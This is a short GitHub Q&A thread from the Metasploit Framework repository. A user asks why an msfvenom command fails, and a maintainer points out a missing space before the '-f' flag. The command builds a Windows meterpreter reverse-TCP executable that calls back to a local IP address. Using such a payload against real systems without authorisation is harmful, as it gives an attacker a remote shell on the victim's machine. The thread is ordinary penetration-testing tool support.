### DISCUSSION TITLE
kali question

### DISCUSSION THREAD

**Discussion by 19873753497** [rapid7/metasploit-framework#19264] [Q&A]
(root㉿kali)-[/home/kali/Desktop] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.35.128 lport=11236-f exe-o demo9999.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload Error: One or more options failed to validate: LPORT.
What's the problem here?

**Comment by bcoles** [comment]
> (root㉿kali)-[/home/kali/Desktop] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.35.128 lport=11236-f exe-o demo9999.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload Error: One or more options failed to validate: LPORT. What's the problem here?

Your `lport` is invalid.

Use:

```
lport=11236 -f
```

Not:

```
lport=11236-f
```
